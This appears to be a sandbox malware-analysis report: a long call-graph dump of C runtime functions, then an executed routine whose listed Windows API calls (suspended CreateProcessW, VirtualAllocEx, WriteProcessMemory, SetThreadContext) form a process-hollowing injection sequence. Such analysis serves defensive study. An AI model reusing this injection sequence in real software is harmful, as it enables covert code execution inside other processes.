9fed28 EnterCriticalSection 21161->21164 21163 9f7a37 21164->21163 17026 a08a61 17044 a05cb7 17026->17044 17028 a08a6e 17029 a08a96 17028->17029 17030 a08a7a 17028->17030 17031 a08ab1 17029->17031 17032 a08aa4 17029->17032 17062 9febab 17030->17062 17039 a08ac4 17031->17039 17065 a08c1d 17031->17065 17034 9febab __dosmaperr 15 API calls 17032->17034 17035 a08a7f 17034->17035 17037 a08b26 17051 a08b51 17037->17051 17039->17035 17039->17037 17073 a05cf3 17039->17073 17045 a05cc3 17044->17045 17046 a05cd8 17044->17046 17047 9febab __dosmaperr 15 API calls 17045->17047 17046->17028 17048 a05cc8 17047->17048 17084 9fcbcf 17048->17084 17052 a05cb7 _Fputc 26 API calls 17051->17052 17053 a08b60 17052->17053 17054 a08c03 17053->17054 17055 a08b73 17053->17055 17331 a08019 17054->17331 17057 a08b90 17055->17057 17060 a08bb4 17055->17060 17058 a08019 ___scrt_uninitialize_crt 63 API calls 17057->17058 17059 a08b34 17058->17059 17060->17059 17356 a097ce 17060->17356 17063 a04327 __dosmaperr 15 API calls 17062->17063 17064 9febb0 17063->17064 17064->17035 17066 a08c33 17065->17066 17067 a08c37 17065->17067 17066->17039 17068 a0cb20 __fread_nolock 26 API calls 17067->17068 17069 a08c86 17067->17069 17070 a08c58 17068->17070 17069->17039 17070->17069 17071 a08c60 SetFilePointerEx 17070->17071 17071->17069 17072 a08c77 GetFileSizeEx 17071->17072 17072->17069 17075 a05cff 17073->17075 17074 a05d20 17074->17037 17079 a09804 17074->17079 17075->17074 17076 a05cb7 _Fputc 26 API calls 17075->17076 17077 a05d1a 17076->17077 17078 a10d41 __fread_nolock 26 API calls 17077->17078 17078->17074 17080 a04422 __dosmaperr 15 API calls 17079->17080 17081 a09821 17080->17081 17082 a0447f _free 15 API calls 17081->17082 17083 a0982b 17082->17083 17083->17037 17087 9fcb6b 17084->17087 17086 9fcbdb 17086->17028 17095 a04327 GetLastError 17087->17095 17089 9fcb76 17090 9fcb84 17089->17090 17118 9fcbfc IsProcessorFeaturePresent 17089->17118 17090->17086 17092 9fcbce 17093 9fcb6b __strnicoll 26 API calls 17092->17093 17094 9fcbdb 17093->17094 17094->17086 17096 a0433e 17095->17096 17100 a04344 17095->17100 17122 a064b8 17096->17122 17099 a04362 17117 a0434a SetLastError 17099->17117 17133 a04422 17099->17133 17100->17117 17127 a064f7 17100->17127 17104 a04391 17107 a064f7 __dosmaperr 7 API calls 17104->17107 17105 a0437a 17106 a064f7 __dosmaperr 7 API calls 17105->17106 17109 a04388 17106->17109 17108 a0439d 17107->17108 17110 a043a1 17108->17110 17111 a043b2 17108->17111 17140 a0447f 17109->17140 17112 a064f7 __dosmaperr 7 API calls 17110->17112 17146 a03ffe 17111->17146 17112->17109 17116 a0447f _free 13 API calls 17116->17117 17117->17089 17119 9fcc08 17118->17119 17317 9fca23 17119->17317 17151 a062a7 17122->17151 17125 a064dd 17125->17100 17126 a064ef TlsGetValue 17128 a062a7 std::_Lockit::_Lockit 5 API calls 17127->17128 17129 a06513 17128->17129 17130 a06531 TlsSetValue 17129->17130 17131 a0651c FlsSetValue 17129->17131 17131->17099 17138 a0442f __dosmaperr 17133->17138 17134 a0446f 17137 9febab __dosmaperr 14 API calls 17134->17137 17135 a0445a RtlAllocateHeap 17136 a04372 17135->17136 17135->17138 17136->17104 17136->17105 17137->17136 17138->17134 17138->17135 17165 a00cac 17138->17165 17141 a0448a HeapFree 17140->17141 17145 a044b3 __dosmaperr 17140->17145 17142 a0449f 17141->17142 17141->17145 17143 9febab __dosmaperr 13 API calls 17142->17143 17144 a044a5 GetLastError 17143->17144 17144->17145 17145->17117 17179 a03e92 17146->17179 17152 a062d5 17151->17152 17155 a062d1 17151->17155 17152->17155 17158 a061e0 17152->17158 17155->17125 17155->17126 17156 a062ef GetProcAddress 17156->17155 17157 a062ff std::_Lockit::_Lockit 17156->17157 17157->17155 17163 a061f1 ___vcrt_FlsFree 17158->17163 17159 a0629c 17159->17155 17159->17156 17160 a0620f LoadLibraryExW 17161 a0622a GetLastError 17160->17161 17160->17163 17161->17163 17162 a06285 FreeLibrary 17162->17163 17163->17159 17163->17160 17163->17162 17164 a0625d LoadLibraryExW 17163->17164 17164->17163 17168 a00cd9 17165->17168 17169 a00ce5 CallCatchBlock 17168->17169 17174 9fe1b2 EnterCriticalSection 17169->17174 17171 a00cf0 17175 a00d2c 17171->17175 17174->17171 17178 9fe1fa LeaveCriticalSection 17175->17178 17177 a00cb7 17177->17138 17178->17177 17180 a03e9e CallCatchBlock 17179->17180 17193 9fe1b2 EnterCriticalSection 17180->17193 17182 a03ea8 17194 a03ed8 17182->17194 17185 a03fa4 17186 a03fb0 CallCatchBlock 17185->17186 17198 9fe1b2 EnterCriticalSection 17186->17198 17188 a03fba 17199 a04185 17188->17199 17190 a03fd2 17203 a03ff2 17190->17203 17193->17182 17197 9fe1fa LeaveCriticalSection 17194->17197 17196 a03ec6 17196->17185 17197->17196 17198->17188 17200 a04194 __Getctype 17199->17200 17201 a041bb __Getctype 17199->17201 17200->17201 17206 a0d8f4 17200->17206 17201->17190 17316 9fe1fa LeaveCriticalSection 17203->17316 17205 a03fe0 17205->17116 17208 a0d974 17206->17208 17209 a0d90a 17206->17209 17210 a0447f _free 15 API calls 17208->17210 17233 a0d9c2 17208->17233 17209->17208 17213 a0d93d 17209->17213 17216 a0447f _free 15 API calls 17209->17216 17211 a0d996 17210->17211 17212 a0447f _free 15 API calls 17211->17212 17214 a0d9a9 17212->17214 17218 a0447f _free 15 API calls 17213->17218 17232 a0d95f 17213->17232 17219 a0447f _free 15 API calls 17214->17219 17215 a0447f _free 15 API calls 17220 a0d969 17215->17220 17222 a0d932 17216->17222 17217 a0d9d0 17221 a0da30 17217->17221 17228 a0447f 15 API calls _free 17217->17228 17223 a0d954 17218->17223 17224 a0d9b7 17219->17224 17225 a0447f _free 15 API calls 17220->17225 17226 a0447f _free 15 API calls 17221->17226 17234 a0cba0 17222->17234 17262 a0d054 17223->17262 17225->17208 17228->17217 17232->17215 17274 a0da65 17233->17274 17235 a0cbb1 17234->17235 17261 a0cc9a 17234->17261 17236 a0cbc2 17235->17236 17238 a0447f _free 15 API calls 17235->17238 17237 a0cbd4 17236->17237 17239 a0447f _free 15 API calls 17236->17239 17238->17236 17239->17237 17261->17213 17263 a0d061 17262->17263 17273 a0d0b9 17262->17273 17264 a0d071 17263->17264 17265 a0447f _free 15 API calls 17263->17265 17265->17264 17273->17232 17275 a0da72 17274->17275 17276 a0da91 17274->17276 17275->17276 17280 a0d57f 17275->17280 17276->17217 17279 a0447f _free 15 API calls 17279->17276 17281 a0d65d 17280->17281 17282 a0d590 17280->17282 17281->17279 17283 a0d2cb __Getctype 15 API calls 17282->17283 17316->17205 17318 9fca3f __fread_nolock CallCatchBlock 17317->17318 17319 9fca6b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17318->17319 17320 9fcb3c CallCatchBlock 17319->17320 17323 9f8f7d 17320->17323 17322 9fcb5a GetCurrentProcess TerminateProcess 17322->17092 17324 9f8f86 IsProcessorFeaturePresent 17323->17324 17325 9f8f85 17323->17325 17327 9f962f 17324->17327 17325->17322 17330 9f95f2 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17327->17330 17329 9f9712 17329->17322 17330->17329 17332 a08025 CallCatchBlock 17331->17332 17333 a08045 17332->17333 17334 a0802d 17332->17334 17335 a080e0 17333->17335 17340 a08077 17333->17340 17404 9feb98 17334->17404 17337 9feb98 __dosmaperr 15 API calls 17335->17337 17339 a080e5 17337->17339 17343 9febab __dosmaperr 15 API calls 17339->17343 17359 a0ca49 EnterCriticalSection 17340->17359 17341 9febab __dosmaperr 15 API calls 17342 a0803a 17341->17342 17342->17059 17345 a080ed 17343->17345 17347 9fcbcf __strnicoll 26 API calls 17345->17347 17346 a0807d 17348 a08099 17346->17348 17349 a080ae 17346->17349 17347->17342 17350 9febab __dosmaperr 15 API calls 17348->17350 17360 a0810b 17349->17360 17352 a0809e 17350->17352 17354 9feb98 __dosmaperr 15 API calls 17352->17354 17353 a080a9 17407 a080d8 17353->17407 17354->17353 17699 a09646 17356->17699 17359->17346 17361 a0812d 17360->17361 17399 a08149 17360->17399 17362 a08131 17361->17362 17365 a08181 17361->17365 17363 9feb98 __dosmaperr 15 API calls 17362->17363 17364 a08136 17363->17364 17367 9febab __dosmaperr 15 API calls 17364->17367 17366 a08197 17365->17366 17424 a097e9 17365->17424 17410 a07cb2 17366->17410 17370 a0813e 17367->17370 17372 9fcbcf __strnicoll 26 API calls 17370->17372 17372->17399 17373 a081a5 17377 a081a9 17373->17377 17378 a081cb 17373->17378 17374 a081de 17375 a081f2 17374->17375 17376 a08238 WriteFile 17374->17376 17379 a08228 17375->17379 17380 a081fa 17375->17380 17382 a0825b GetLastError 17376->17382 17395 a08216 17376->17395 17381 a082a5 17377->17381 17427 a07c4a 17377->17427 17432 a0789e GetConsoleOutputCP 17378->17432 17417 a07d23 17379->17417 17384 a08218 17380->17384 17385 a081ff 17380->17385 17391 9febab __dosmaperr 15 API calls 17381->17391 17381->17399 17382->17395 17452 a07ee7 17384->17452 17385->17381 17388 a08208 17385->17388 17445 a07dfe 17388->17445 17390 a081c1 17390->17381 17393 a0827b 17390->17393 17390->17399 17392 a082c6 17391->17392 17396 9feb98 __dosmaperr 15 API calls 17392->17396 17397 a08282 17393->17397 17398 a08299 17393->17398 17395->17390 17396->17399 17400 9febab __dosmaperr 15 API calls 17397->17400 17460 9feb75 17398->17460 17399->17353 17402 a08287 17400->17402 17403 9feb98 __dosmaperr 15 API calls 17402->17403 17403->17399 17405 a04327 __dosmaperr 15 API calls 17404->17405 17406 9feb9d 17405->17406 17406->17341 17698 a0ca6c LeaveCriticalSection 17407->17698 17409 a080de 17409->17342 17465 a10d41 17410->17465 17412 a07cc3 17413 a07d19 17412->17413 17474 a041d0 GetLastError 17412->17474 17413->17373 17413->17374 17416 a07d00 GetConsoleMode 17416->17413 17418 a07d32 ___scrt_uninitialize_crt 17417->17418 17421 a07da2 WriteFile 17418->17421 17423 a07de3 17418->17423 17419 9f8f7d __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 17420 a07dfc 17419->17420 17420->17390 17421->17418 17422 a07de5 GetLastError 17421->17422 17422->17423 17423->17419 17609 a09752 17424->17609 17428 a07ca1 17427->17428 17431 a07c6c 17427->17431 17428->17390 17429 a11079 5 API calls ___scrt_uninitialize_crt 17429->17431 17430 a07ca3 GetLastError 17430->17428 17431->17428 17431->17429 17431->17430 17631 9fd21e 17432->17631 17435 9f8f7d __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 17436 a07c48 17435->17436 17436->17390 17437 a04fd9 39 API calls __fassign 17441 a078fa _Yarn 17437->17441 17438 a07ba0 17438->17435 17439 a0f514 20 API calls __cftoe 17439->17441 17441->17437 17441->17438 17441->17439 17442 a07b23 WriteFile 17441->17442 17444 a07b5b WriteFile 17441->17444 17639 9fe4c0 17441->17639 17644 a0b091 17441->17644 17442->17441 17443 a07c18 GetLastError 17442->17443 17443->17438 17444->17441 17444->17443 17449 a07e0d ___scrt_uninitialize_crt 17445->17449 17446 a07ecc 17447 9f8f7d __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 17446->17447 17450 a07ee5 17447->17450 17448 a07e82 WriteFile 17448->17449 17451 a07ece GetLastError 17448->17451 17449->17446 17449->17448 17450->17395 17451->17446 17453 a07ef6 ___scrt_uninitialize_crt 17452->17453 17456 a0b091 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 17453->17456 17457 a08000 GetLastError 17453->17457 17458 a07fb5 WriteFile 17453->17458 17459 a07ffe 17453->17459 17454 9f8f7d __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 17455 a08017 17454->17455 17455->17395 17456->17453 17457->17459 17458->17453 17458->17457 17459->17454 17461 9feb98 __dosmaperr 15 API calls 17460->17461 17462 9feb80 __dosmaperr 17461->17462 17463 9febab __dosmaperr 15 API calls 17462->17463 17464 9feb93 17463->17464 17464->17399 17466 a10d4e 17465->17466 17468 a10d5b 17465->17468 17467 9febab __dosmaperr 15 API calls 17466->17467 17470 a10d53 17467->17470 17469 9febab __dosmaperr 15 API calls 17468->17469 17471 a10d67 17468->17471 17472 a10d88 17469->17472 17470->17412 17471->17412 17473 9fcbcf __strnicoll 26 API calls 17472->17473 17473->17470 17475 a041ed 17474->17475 17476 a041e7 17474->17476 17478 a064f7 __dosmaperr 7 API calls 17475->17478 17498 a041f3 SetLastError 17475->17498 17477 a064b8 __dosmaperr 6 API calls 17476->17477 17477->17475 17479 a0420b 17478->17479 17480 a04422 __dosmaperr 15 API calls 17479->17480 17479->17498 17482 a0421b 17480->17482 17485 a04223 17482->17485 17486 a0423a 17482->17486 17483 a04281 17483->17413 17483->17416 17484 a04287 17501 a007e9 17484->17501 17489 a064f7 __dosmaperr 7 API calls 17485->17489 17488 a064f7 __dosmaperr 7 API calls 17486->17488 17491 a04246 17488->17491 17492 a04231 17489->17492 17493 a0424a 17491->17493 17494 a0425b 17491->17494 17495 a0447f _free 15 API calls 17492->17495 17496 a064f7 __dosmaperr 7 API calls 17493->17496 17497 a03ffe __dosmaperr 15 API calls 17494->17497 17495->17498 17496->17492 17499 a04266 17497->17499 17498->17483 17498->17484 17500 a0447f _free 15 API calls 17499->17500 17500->17498 17512 a0addd 17501->17512 17505 a00803 IsProcessorFeaturePresent 17509 a0080f 17505->17509 17506 a00822 17542 a017bb 17506->17542 17508 a007f9 17508->17505 17508->17506 17545 a0ad0f 17512->17545 17515 a0ae22 17516 a0ae2e CallCatchBlock 17515->17516 17517 a04327 __dosmaperr 15 API calls 17516->17517 17518 a0ae5b CallCatchBlock 17516->17518 17522 a0ae55 CallCatchBlock 17516->17522 17517->17522 17522->17518 17546 a0ad1b CallCatchBlock 17545->17546 17551 9fe1b2 EnterCriticalSection 17546->17551 17548 a0ad29 17552 a0ad67 17548->17552 17551->17548 17555 9fe1fa LeaveCriticalSection 17552->17555 17554 a007ee 17554->17508 17554->17515 17555->17554 17618 a0cb20 17609->17618 17611 a09764 17612 a0976c 17611->17612 17613 a0977d SetFilePointerEx 17611->17613 17614 9febab __dosmaperr 15 API calls 17612->17614 17615 a09795 GetLastError 17613->17615 17617 a09771 17613->17617 17614->17617 17616 9feb75 __dosmaperr 15 API calls 17615->17616 17616->17617 17617->17366 17619 a0cb42 17618->17619 17620 a0cb2d 17618->17620 17622 9feb98 __dosmaperr 15 API calls 17619->17622 17624 a0cb67 17619->17624 17621 9feb98 __dosmaperr 15 API calls 17620->17621 17623 a0cb32 17621->17623 17625 a0cb72 17622->17625 17626 9febab __dosmaperr 15 API calls 17623->17626 17624->17611 17627 9febab __dosmaperr 15 API calls 17625->17627 17628 a0cb3a 17626->17628 17629 a0cb7a 17627->17629 17628->17611 17630 9fcbcf __strnicoll 26 API calls 17629->17630 17630->17628 17632 9fd235 17631->17632 17633 9fd23e 17631->17633 17632->17441 17633->17632 17634 a041d0 __Getctype 38 API calls 17633->17634 17635 9fd25e 17634->17635 17647 a0514e 17635->17647 17640 a041d0 __Getctype 38 API calls 17639->17640 17641 9fe4cb 17640->17641 17642 a0514e __Getctype 38 API calls 17641->17642 17643 9fe4db 17642->17643 17643->17441 17645 a0b0a8 WideCharToMultiByte 17644->17645 17645->17441 17648 a05161 17647->17648 17649 9fd274 17647->17649 17648->17649 17655 a0db40 17648->17655 17651 a0517b 17649->17651 17652 a051a3 17651->17652 17653 a0518e 17651->17653 17652->17632 17653->17652 17677 a0c232 17653->17677 17656 a0db4c CallCatchBlock 17655->17656 17657 a041d0 __Getctype 38 API calls 17656->17657 17658 a0db55 17657->17658 17659 a0db9b 17658->17659 17668 9fe1b2 EnterCriticalSection 17658->17668 17659->17649 17661 a0db73 17668->17661 17678 a041d0 __Getctype 38 API calls 17677->17678 17679 a0c23c 17678->17679 17682 a0c14a 17679->17682 17698->17409 17700 a09652 CallCatchBlock 17699->17700 17701 a09672 17700->17701 17702 a0965a 17700->17702 17704 a09723 17701->17704 17709 a096a7 17701->17709 17703 9feb98 __dosmaperr 15 API calls 17702->17703 17705 a0965f 17703->17705 17706 9feb98 __dosmaperr 15 API calls 17704->17706 17707 9febab __dosmaperr 15 API calls 17705->17707 17708 a09728 17706->17708 17710 a09667 17707->17710 17711 9febab __dosmaperr 15 API calls 17708->17711 17724 a0ca49 EnterCriticalSection 17709->17724 17710->17059 17713 a09730 17711->17713 17715 9fcbcf __strnicoll 26 API calls 17713->17715 17714 a096ad 17716 a096d1 17714->17716 17717 a096e6 17714->17717 17715->17710 17719 9febab __dosmaperr 15 API calls 17716->17719 17718 a09752 __fread_nolock 28 API calls 17717->17718 17720 a096e1 17718->17720 17721 a096d6 17719->17721 17725 a0971b 17720->17725 17722 9feb98 __dosmaperr 15 API calls 17721->17722 17722->17720 17724->17714 17728 a0ca6c LeaveCriticalSection 17725->17728 17727 a09721 17727->17710 17728->17727 21273 a0847a 21274 a08486 CallCatchBlock 21273->21274 21275 a084a3 21274->21275 21276 a0848c 21274->21276 21286 9fed28 EnterCriticalSection 21275->21286 21277 9febab __dosmaperr 15 API calls 21276->21277 21279 a08491 21277->21279 21281 9fcbcf __strnicoll 26 API calls 21279->21281 21280 a084b3 21287 a084fa 21280->21287 21283 a0849c 21281->21283 21284 a084bf 21307 a084f0 21284->21307 21286->21280 21288 a08508 21287->21288 21289 a0851f 21287->21289 21290 9febab __dosmaperr 15 API calls 21288->21290 21291 a05cb7 _Fputc 26 API calls 21289->21291 21292 a0850d 21290->21292 21293 a08529 21291->21293 21294 9fcbcf __strnicoll 26 API calls 21292->21294 21296 a097ce 30 API calls 21293->21296 21295 a08518 21294->21295 21295->21284 21297 a08544 21296->21297 21298 a085b7 21297->21298 21299 a0860c 21297->21299 21306 a0856e __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21297->21306 21301 a085d1 21298->21301 21304 a085e5 21298->21304 21300 a0861a 21299->21300 21299->21304 21302 9febab __dosmaperr 15 API calls 21300->21302 21310 a08837 21301->21310 21302->21306 21304->21306 21322 a0867e 21304->21322 21306->21284 21329 9fed3c LeaveCriticalSection 21307->21329 21309 a084f8 21309->21283 21311 a08846 ___scrt_uninitialize_crt 21310->21311 21312 a05cb7 _Fputc 26 API calls 21311->21312 21313 a08859 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21312->21313 21315 a097ce 30 API calls 21313->21315 21321 a08865 21313->21321 21314 9f8f7d __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 21316 a089cb 21314->21316 21317 a088b3 21315->21317 21316->21306 21318 a088e5 ReadFile 21317->21318 21317->21321 21319 a0890c 21318->21319 21318->21321 21320 a097ce 30 API calls 21319->21320 21320->21321 21321->21314 21323 a05cb7 _Fputc 26 API calls 21322->21323 21324 a08691 21323->21324 21325 a097ce 30 API calls 21324->21325 21328 a086d9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21324->21328 21326 a08729 21325->21326 21327 a097ce 30 API calls 21326->21327 21326->21328 21327->21328 21328->21306 21329->21309 19108 9f3f40 19109 9f3f4e 19108->19109 19110 9f3fa5 19108->19110 19109->19110 19112 9f7bc5 19109->19112 19114 9f7be1 19112->19114 19117 9f7be8 19112->19117 19113 9f8f7d __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 19115 9f7ccb 19113->19115 19114->19113 19115->19109 19117->19114 19118 9f7c8e 19117->19118 19119 9f7c31 19117->19119 19118->19114 19120 9ffcb7 66 API calls 19118->19120 19119->19114 19121 9f72a7 19119->19121 19120->19114 19124 9ff35b 19121->19124 19123 9f72b7 19123->19114 19125 9ff367 CallCatchBlock 19124->19125 19126 9ff36e 19125->19126 19127 9ff386 19125->19127 19128 9febab __dosmaperr 15 API calls 19126->19128 19142 9fed28 EnterCriticalSection 19127->19142 19130 9ff373 19128->19130 19132 9fcbcf __strnicoll 26 API calls 19130->19132 19131 9ff390 19133 9ff429 _Fputc 19131->19133 19134 a05cb7 _Fputc 26 API calls 19131->19134 19141 9ff37e _Fputc 19132->19141 19143 9ff45d 19133->19143 19136 9ff3aa 19134->19136 19136->19133 19137 9ff401 19136->19137 19138 9febab __dosmaperr 15 API calls 19137->19138 19139 9ff406 19138->19139 19140 9fcbcf __strnicoll 26 API calls 19139->19140 19140->19141 19141->19123 19142->19131 19146 9fed3c LeaveCriticalSection 19143->19146 19145 9ff463 19145->19141 19146->19145 22463 9f7f76 22464 9f7fa1 22463->22464 22465 9f7f7f 22463->22465 22465->22464 22467 9ff13e 22465->22467 22468 9ff150 22467->22468 22471 9ff159 ___scrt_uninitialize_crt 22467->22471 22469 9fefe3 ___scrt_uninitialize_crt 67 API calls 22468->22469 22470 9ff156 22469->22470 22470->22464 22472 9ff16a 22471->22472 22475 9fef83 22471->22475 22472->22464 22476 9fef8f CallCatchBlock 22475->22476 22483 9fed28 EnterCriticalSection 22476->22483 22478 9fef9d 22479 9ff0ed ___scrt_uninitialize_crt 67 API calls 22478->22479 22480 9fefae 22479->22480 22484 9fefd7 22480->22484 22483->22478 22487 9fed3c LeaveCriticalSection 22484->22487 22486 9fefc0 22486->22464 22487->22486 21399 9f7e6f 21400 9f7e91 21399->21400 21404 9f7ea6 21399->21404 21401 9f7782 66 API calls 21400->21401 21402 9f7e96 21401->21402 21402->21404 21405 9ff786 21402->21405 21406 9ff7a6 21405->21406 21407 9ff791 21405->21407 21406->21407 21409 9ff7ad 21406->21409 21408 9febab __dosmaperr 15 API calls 21407->21408 21410 9ff796 21408->21410 21415 9ffa7d 21409->21415 21412 9fcbcf __strnicoll 26 API calls 21410->21412 21414 9ff7a1 21412->21414 21414->21404 21418 9ff83b 21415->21418 21421 9ff847 CallCatchBlock 21418->21421 21419 9ff84d 21420 9febab __dosmaperr 15 API calls 21419->21420 21424 9ff852 21420->21424 21421->21419 21422 9ff873 21421->21422 21431 9fed28 EnterCriticalSection 21422->21431 21426 9fcbcf __strnicoll 26 API calls 21424->21426 21425 9ff87f 21432 9ff99f 21425->21432 21428 9ff7bc 21426->21428 21428->21404 21429 9ff893 21443 9ff8bc 21429->21443 21431->21425 21433 9ff9c2 21432->21433 21434 9ff9b2 21432->21434 21446 9ff8c6 21433->21446 21435 9febab __dosmaperr 15 API calls 21434->21435 21437 9ff9b7 21435->21437 21437->21429 21438 9ffa68 21438->21429 21439 9ff9e5 21439->21438 21440 9ff088 ___scrt_uninitialize_crt 63 API calls 21439->21440 21441 9ffa0c 21440->21441 21442 a097e9 __fread_nolock 28 API calls 21441->21442 21442->21438 21450 9fed3c LeaveCriticalSection 21443->21450 21445 9ff8c4 21445->21428 21447 9ff8d7 21446->21447 21449 9ff92f 21446->21449 21448 a097e9 __fread_nolock 28 API calls 21447->21448 21447->21449 21448->21449 21449->21439 21450->21445

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00A22181 Relevance: 21.5, APIs: 11, Strings: 1, Instructions: 467injectionmemorythreadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 a22181-a22191 1 a22773 0->1 2 a22197-a2219b 0->2 4 a22775-a2277b 1->4 2->1 3 a221a1-a22363 call a2214c * 2 2->3 9 a22365-a22385 call a22057 3->9 9->1 12 a2238b-a2238f 9->12 12->9 13 a22391 12->13 14 a22393-a223f1 13->14 18 a223f3-a223f9 14->18 19 a22409-a2240b 14->19 18->19 20 a223fb-a223ff 18->20 21 a2240e-a2241e 19->21 20->19 23 a22401-a22407 20->23 21->1 22 a22424-a22430 21->22 22->1 24 a22436-a22444 22->24 23->21 24->1 25 a2244a-a22467 CreateProcessW 24->25 26 a22732 25->26 27 a2246d-a2247c GetThreadContext 25->27 28 a22734-a22738 26->28 27->26 29 a22482-a224a0 ReadProcessMemory 27->29 30 a2274a-a2274e 28->30 31 a2273a-a22744 28->31 29->26 32 a224a6-a224ac 29->32 33 a22750 30->33 34 a22756-a22758 30->34 31->30 35 a224ae-a224b7 32->35 36 a224bd-a224d4 VirtualAlloc 32->36 33->34 38 a22764-a2276d 34->38 39 a2275a-a22760 34->39 35->26 35->36 36->26 40 a224da-a224f2 VirtualAllocEx 36->40 38->1 38->14 39->38 42 a224f4-a224f6 40->42 43 a22535-a2254a 40->43 44 a22510-a22523 42->44 45 a224f8-a2250e 42->45 48 a2257a-a22589 43->48 49 a2254c-a22552 43->49 46 a22524-a2252f 44->46 45->46 46->26 46->43 53 a22610-a22622 WriteProcessMemory 48->53 54 a2258f-a22593 48->54 52 a22554-a22576 49->52 62 a22578 52->62 53->28 55 a22628-a2263f VirtualProtectEx 53->55 54->53 56 a22595-a225a6 54->56 55->28 57 a22645-a2264e 55->57 56->53 59 a225a8-a225b6 56->59 60 a22650-a22656 57->60 61 a226bf-a226cb VirtualFree 57->61 63 a225b8-a225c0 59->63 64 a225f9-a2260e 59->64 68 a22658-a2265f 60->68 61->28 67 a226cd-a226e6 WriteProcessMemory 61->67 62->48 65 a225c2-a225e3 63->65 66 a225e6-a225f7 63->66 64->53 64->59 65->66 66->63 66->64 67->28 69 a226e8-a22706 SetThreadContext 67->69 70 a22661-a22663 68->70 71 a2267a-a2267c 68->71 69->28 72 a22708-a22713 69->72 73 a22665-a22667 70->73 74 a22669-a22678 70->74 75 a22683-a2268e 71->75 76 a2267e 71->76 72->28 82 a22715-a22719 72->82 77 a22680-a22681 73->77 78 a2268f-a226a9 VirtualProtectEx 74->78 75->78 76->77 77->78 79 a226ab-a226bb 78->79 80 a226bd 78->80 79->68 79->80 80->61 83 a22721-a22725 82->83 84 a2271b 82->84 85 a22727 83->85 86 a2272d-a22730 83->86 84->83 85->86 86->4
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00A22462
                                                                                                                                                                          • GetThreadContext.KERNELBASE(?,00010007), ref: 00A22477
                                                                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00A22498
                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00A224CA
                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 00A224EA
                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000000), ref: 00A2261D
                                                                                                                                                                          • VirtualProtectEx.KERNELBASE(?,?,?,00000002,?), ref: 00A2263A
                                                                                                                                                                          • VirtualProtectEx.KERNELBASE(?,?,?,00000001,?), ref: 00A226A4
                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A226C6
                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00A226E1
                                                                                                                                                                          • SetThreadContext.KERNELBASE(?,00010007), ref: 00A226FE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtual$Process$Memory$AllocContextProtectThreadWrite$CreateFreeRead
                                                                                                                                                                          • String ID: D
                                                                                                                                                                          • API String ID: 1154545702-2746444292
                                                                                                                                                                          • Opcode ID: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
                                                                                                                                                                          • Instruction ID: 3c13cebf7488acfbdb9e6ce4594296d0276b3ce382621d432813e662cafbeaab
                                                                                                                                                                          • Opcode Fuzzy Hash: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B121871D00229ABDF25CFA8DD84BEEBBB5FF04704F1484A9E509EA250E7749A84CF54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

